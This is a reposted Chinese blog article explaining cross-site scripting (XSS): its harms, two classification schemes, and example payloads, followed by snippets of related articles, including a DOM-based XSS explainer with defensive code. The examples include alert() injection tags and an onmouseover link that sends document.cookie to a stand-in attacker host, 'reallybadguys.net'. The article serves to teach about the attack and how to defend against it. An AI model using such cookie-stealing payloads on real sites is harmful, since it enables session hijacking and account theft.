Xss(cross-site scripting)攻击

最新推荐文章于 2024-10-02 16:24:46 发布
转载 最新推荐文章于 2024-10-02 16:24:46 发布 · 981 阅读 · 1

Xss(cross-site scripting)攻击指的是攻击者往Web页面里插入恶意html标签或者javascript代码,当用户浏览该页或者进行某些操作时,攻击者利用用户对原网站的信任,诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。
比如:攻击者在论坛中放一个看似安全的链接,骗取用户点击后,窃取cookie中的用户私密信息;或者攻击者在论坛中加一个恶意表单,当用户提交表单的时候,却把信息传送到攻击者的服务器中,而不是用户原本以为的信任站点。
诸如此类,唯一能完全杜绝xss攻击的方法,就是禁用script,img等,显然这是不靠谱的,用户需要丰富的页面内容;当然我们可以用一些方法预防xss攻击,尽量减少xss造成的危害。

XSS攻击的危害包括

盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号
控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
盗窃企业重要的具有商业价值的资料
非法转账
强制发送电子邮件
网站挂马
控制受害者机器向其它网站发起攻击
举例:

<body background=”javascript:alert(‘xss – gotcha!’)”>
<iframe src=javascript:alert(‘xss – gotcha!’)></iframe>
> <body onload=”a();”><script>function a(){alert(‘xss -gotcha!’);}</script><”

xss攻击分类
分类方法一
xss攻击分为两类:从其它站点到应用站点的攻击、从应用站点到同站或其它站点的攻击
从其它站点到应用站点的攻击:故名思义,这种攻击是由外部发起的,来自email或其它站点。这种攻击在用户点击链接,下载图片或者提交表单的时候,对应用网站进行了意想之外的操作。
通常用户登录后会得到一个可用session,xss攻击者可以利用这个session,越过用户验证,进行一些不安全的操作,如下:

<a href = “http:// www.2cto.com /addComment.php?subject = I%20am%20owned” >Check it out!</a>
通过这个链接,只要用户登录了,就会发送一个subject,即使在其它网站上。
正因如此,一般的邮箱客户端不会自动从不信任的网站上加载图片(因为考虑到可以通过img的src属性向第三方站点发送GET请求);另外,可以设置session的过期时间,让session自动失效。

从应用站点到同站或其它站点的攻击:这种攻击,通常是攻击者在应用站点上通过发表评论,或者其它方式嵌入代码,当用户加载页面或者点击链接就会产生一些意想之外的操作。
如下:

<a href=”#” onmouSEOver = “window.location = ‘http://reallybadguys.net/collectCookie.php?cookie = + document cookie.escape();” >Check it out!</a>
当用户滑过链接,就会将cookie信息发到攻击者的服务器上。

分类方法二
xss的另一种分类方法(个人感觉更清楚),将xss攻击分为三种,
类型A,本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。

其攻击过程如下:

Alice给Bob发送一个恶意构造了Web的URL。
Bob点击并查看了这个URL。
恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在Bob电脑上。
具有漏洞的HTML页面包含了在Bob电脑本地域执行的JavaScript
Alice的恶意脚本可以在Bob的电脑上执行Bob所持有的权限下的命令。
类型B

反射式漏洞,这种漏洞和类型A有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。

「2021」高频前端面试题汇总之浏览器原理篇
公众号:前端充电宝
01-15 4070
目录一、浏览器安全1. 什么是XSS ?(1)概念(2)攻击类型2. 如何防御XSS?3. 什么是CSRF ?(1)概念(2)攻击类型4. 如何防御CSRF二、进程与线程1. 进程与线程的概念2. 进程和线程的区别3. 浏览器渲染进程的线程4. 进程之前的通信方式5. 僵尸进程和孤儿进程是什么?6. 死锁产生的原因? 如果解决死锁的问题?三、浏览器缓存1. 说一说浏览器的缓存机制2. 协商缓存和强缓存的区别(1)强缓存(2)协商缓存3. 为什么需要浏览器缓存?4. 用户点击刷新按钮或者按 F5、按 Ctr
pikachu - Cross-Site ScriptingXSS
风依旧的博客
01-09 890
XSS(跨站脚本)概述Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射型XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
xss攻击
qq_46312220的博客
08-18 492
2.1 Xss(跨站脚本攻击) 2.1.1 原理 恶意web用户通过将恶意脚本代码植入到提供给其他用户使用的页面中来达到攻击的目的 2.1.2 攻击类型: 反射型:通过把恶意代码放入url中进行注入,后端解析url并将恶意代码拼接到html中返回给浏览器,浏览器由于无法识别哪些是恶意代码就会解析执行。由于只有点击了这种带有恶意代码的url后攻击才能生效,所有攻击者往往诱导被攻击者点击攻击者定的特色url。 存储型又称持久型:攻击者通过技术博客中的评论,留言,以及各种可能的方式将恶意代码提交到数据
跨站脚本攻击XSSCross Site Script)的原理与常见场景分析
10-18
XSS的是恶意攻击者Web页面插入恶意html代码,当用户浏览该页之时,嵌入其中Web面的html代码会被执行,从而达到恶意攻击用户的特殊目的。这篇文章主要给大家介绍了关于跨站脚本攻击XSSCross Site Script)的原理与常见场景的相关资料,需要的朋友可以参考下。
XSS攻击原理
asdfghjkl978564的博客
09-19 167
XSS全称cross-site scripting攻击的是攻击者Web页面插入恶意html标签或者JavaScript代码,当用户浏览该页或者进行某些操作时,攻击者利用用户对原网站的信任,诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。 比如:(1)点击一个看起来安全的链接, (2)恶意的表单传递到攻击者的服务器上 分类:(1)存储型XSS (2)反射型X...
xss攻击原理与解决方法
热门推荐
套路猿的博客
04-14 8万+
概述XSS攻击Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。攻击的条件实施
pikachu XSS Cross-Site Scripting(皮卡丘漏洞平台通关系列)
箭雨镜屋
03-28 1万+
第一关 反射型xss(get) 1、通关步骤
Pikachu-Cross-Site Scripting-DOM型xss
guanrongl的专栏
10-02 726
是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。dom就是一个树状的模型,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。当点击try it ,调用 没有Function方法, 获得 id为demo的元素,然后修改 它的内容,让他为alert弹窗。这样就可以构造一个完整的闭合, what 前面的 '> 可以不用管,当作时文本的一部分;所以,关键是对这段代码构造闭合;
【网络攻防技术】XSS攻击手实验——Cross-Site Scripting (XSS) Attack Lab
omniscience的博客
11-13 2101
可以利用www.example60.com,image_www文件夹下的apache_csp.conf文件有这些网站的根目录信息,可以把代码保存在www.example60.com,让代码调用这个网站的JavaScript代码。self表示只允许从同一域名加载资源,*.example.com表示只允许加载该域名的子域名的资源,unsafe-inline允许内联脚本(一般script标签的JS代码)、onclick等的执行。此任务的目标是发布一条包含JavaScript恶意消息,以显示一个警报窗口。
【BurpSuite】XSS | Cross-site scripting (1-9)
m0_71944965的博客
09-18 1420
将以下内容复制并粘贴到搜索框中: 在评论框中输入以下内容: 输入姓名、电子邮件和网站 点击“发表评论” 返回博客 用试试 发现js语句未解析 查看源码 写入 先闭合再注入 用试试,果然不行 用 将查询参数更改returnPath后跟任意字符串 在网页代码中查找位置,发现字符串输出位置为href returnPath后语句改为: 从实验室横幅中,打开漏洞利用服务器。 在正文部分中,添加以下恶意代码iframe: 存储漏洞利用程序,然后单击查看漏洞利用程序,print()以确认调用了 该函数。 返回漏
XSS攻击原理
飞鸟Blog
09-04 1万+
<br />跨站脚本攻击XSS攻击与防范南 <br /><br />文章目录 <br /><br />XSS攻击与防范... 1 <br /><br />第一章、XSS的定义... 1 <br /><br />第二章、XSS漏洞代码... 1 <br /><br />第三章、利用XSS盗取cookies. 3 <br /><br />第四章、防范XSS漏洞... 4 <br /><br />第四章、XSS攻击方法... 4 <br /><br />第六章、利用Flash进行XSS攻击... 6 <br
跨站脚本攻击XSS)——常见网站攻击手段原理与防御
guugle2010的专栏
04-10 8618
主要是依靠一切可能的手段,将浏览器中可以执行的脚本(javascript)植入到页面代码中,从而对用户客户端实施攻击。这才是我认为在目前这个“大前端时代”xss攻击的定义。 实际上黑客攻击这种行为从本质上讲,就是想尽一切手段在别人的代码环境中执行自己的代码
XSS攻击-原理学习
an6992的博客
09-26 650
本文优先发布于简书https://www.jianshu.com/p/04e0f8971890 1、百度百科XSS,跨站脚本攻击Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,通常将跨站脚本攻击缩写为XSSXSS攻击,通常的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意...
XSS攻击原理以及手段
weixin_33901843的博客
04-06 234
XSS攻击方式:反射型,存储型 存储型:两者差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用提交XSS代码 反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,所以称为发射型XSSXSS攻击的防范措施 编码 对用户输入...
XSS攻击原理及常见的XSS攻击
weixin_47218056的博客
09-25 6519
一、什么是XSS攻击XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击XSS的重点不在于跨站点,而在于脚本的执行。那么XSS的原理是: 恶意攻击者web页面中会插入一些恶意的script代码。当用户浏览该页面的时候,那么嵌入到web页面中script代码会执行,因此会达到恶意攻击用户的目的。那么XSS攻击最主要有如下分类:反射型、存储型、及 DOM-based型。 反射性和DOM-baseed型可以归类为非持久性XSS攻击。存储型可以归类为持久性XSS攻击。 二、反射性X
详解 XSS 攻击原理
听得到微笑的博客
10-29 1万+
跨站脚本攻击Cross Site Scripting)本来的缩写为CSS,为了与层叠样式表(Cascading Style Sheets,CSS)的缩写进行区分,将跨站脚本攻击缩写为XSS。因此XSS是跨站脚本的意思。XSS跨站脚本攻击Cross Site Scripting)的本质是攻击者web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面之时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。
XSS攻击的原理、分类和防御方法
Andrew的博客
02-27 1万+
.XSS攻击的原理 XSS的原理是WEB应用程序混淆了用户提交的数据和JS脚本的代码边界,导致浏览器把用户的输入当成了JS代码来执行。XSS攻击对象是浏览器一端的普通用户。   二.XSS攻击的分类 1.反射型XSS 反射型XSS,又称非持久型XSS。也就是攻击相当于受害者而言是一次性的,具体表现在受害者点击了含有的恶意JavaScript脚本的url,而Web应用程序只是不加处理的...
XSS攻击原理解析
海宇的博客
04-16 272
[size=large][b]XSS全称Cross Site Script,跨站脚本攻击[/b][/size] 它的是恶意攻击者Web页面插入恶意html代码,当用户浏览该页之时,嵌入其中Web面的html代码会被执行,从而达到恶意用户的特殊目的。 [size=large][b]主要途径[/b][/size] 1、对普通的用户输入,页面原样内容输出,(用户的输入包括coo...
XSS 攻击原理及防护
weixin_30609331的博客
08-07 208
  XSS跨站脚本攻击的英文全称是:cross-site scripting,它是 web 应用中最常见的一种计算机安全漏洞;恶意的网站用户可以通过它将一些代码插入其他用户访问的页面中去,这些代码通常是一些客户端脚本程序;攻击者能够利用这种漏洞去绕过一些访问控制、进行身份钓鱼、钓鱼攻击、网页挂马等等攻击行为,从而造成信息泄露甚至是大量的经济损失。   xss 漏洞攻击的特点:1)、xs...
Xss-dom-based cross-site scripting
最新发布
08-06
### DOM-Based XSS 攻击的原理 DOM-Based XSS 是一种特殊的跨站脚本攻击XSS),其核心原理在于攻击者通过操纵文档对象模型(DOM)来注入恶意脚本。与传统的反射型或存储型 XSS 不同,DOM-Based XSS攻击过程完全发生在客户端,服务器端不会直接参与恶意脚本的注入或执行。攻击者通常通过构造恶意 URL,利用客户端 JavaScript 从 URL 中提取参数并动态修改页面内容的方式,将恶意代码注入到页面中。例如,当 JavaScript 从 URL 中获取参数并将其插入页面中的某个 DOM 节点时,如果没有对输入进行适当的过滤或转义,攻击者就可以注入恶意脚本,从而在用户的浏览器中执行[^1]。 ### DOM-Based XSS 攻击的实现方式 DOM-Based XSS 的实现依赖于客户端脚本对 DOM 的操作。例如,JavaScript 可能会通过 `document.write()`、`innerHTML`、`eval()` 等方法将用户输入的数据直接插入页面中。攻击者可以构造包含恶意代码的 URL,当用户访问该 URL 时,恶意代码会被执行。这种攻击通常不需要服务器端的响应,而是完全依赖于客户端脚本的处理逻辑。例如,攻击者可能构造一个 URL,如 `http://example.com/page?param=<script>alert('XSS')</script>`,如果页面中的 JavaScript 直接将 `param` 参数的值插入到 DOM 中,而没有进行任何安全处理,则会触发 XSS 攻击[^2]。 ### DOM-Based XSS 的防范措施 为了防范 DOM-Based XSS 攻击,开发人员需要采取一系列的安全措施。首先,避免直接将用户输入的数据插入到 DOM 中,尤其是在使用 `innerHTML`、`document.write()` 等方法时。如果必须使用这些方法,应对输入数据进行严格的过滤和转义处理。其次,可以使用内容安全策略(Content Security Policy, CSP),通过限制页面中可以执行的脚本来源,来防止恶意脚本的执行。此外,开发人员应尽量避免使用 `eval()`、`setTimeout()` 等可能执行动态代码的函数,或者在使用这些函数时确保输入数据是可信的。最后,对用户输入进行严格的验证和清理,确保输入数据不会包含任何潜在的恶意代码[^3]。 ### 示例代码 以下是一个简单的示例,展示如何通过 JavaScript 安全地处理用户输入,以防止 DOM-Based XSS 攻击: ```javascript // 获取 URL 参数 function getParameterByName(name, url) { if (!url) url = window.location.href; name = name.replace(/[\[\]]/g, '\\$&'); var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'), results = regex.exec(url); if (!results) return null; if (!results[2]) return ''; return decodeURIComponent(results[2].replace(/\+/g, ' ')); } // 安全地插入文本到 DOM 节点 function safeInsertText(elementId, text) { var element = document.getElementById(elementId); if (element) { // 使用 textContent 而不是 innerHTML 来避免 XSS element.textContent = text; } } // 获取 URL 中的参数并安全地插入页面中 var userInput = getParameterByName('param'); safeInsertText('output', userInput); ``` 在这个示例中,`safeInsertText` 函数使用 `textContent` 属性而不是 `innerHTML`,这样可以确保输入数据不会被解析为 HTML,从而避免了潜在的 XSS 攻击。 ### 相关问题 1. DOM-Based XSS 与其他类型的 XSS 有何区别? 2. 如何在实际开发中检测和修复 DOM-Based XSS 漏洞? 3. 内容安全策略(CSP)是如何帮助防范 DOM-Based XSS 攻击的? 4. 有哪些工具可以帮助开发者测试和发现 DOM-Based XSS 漏洞? 5. 在现代 Web 开发中,有哪些最佳实践可以用来防止 DOM-Based XSS
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值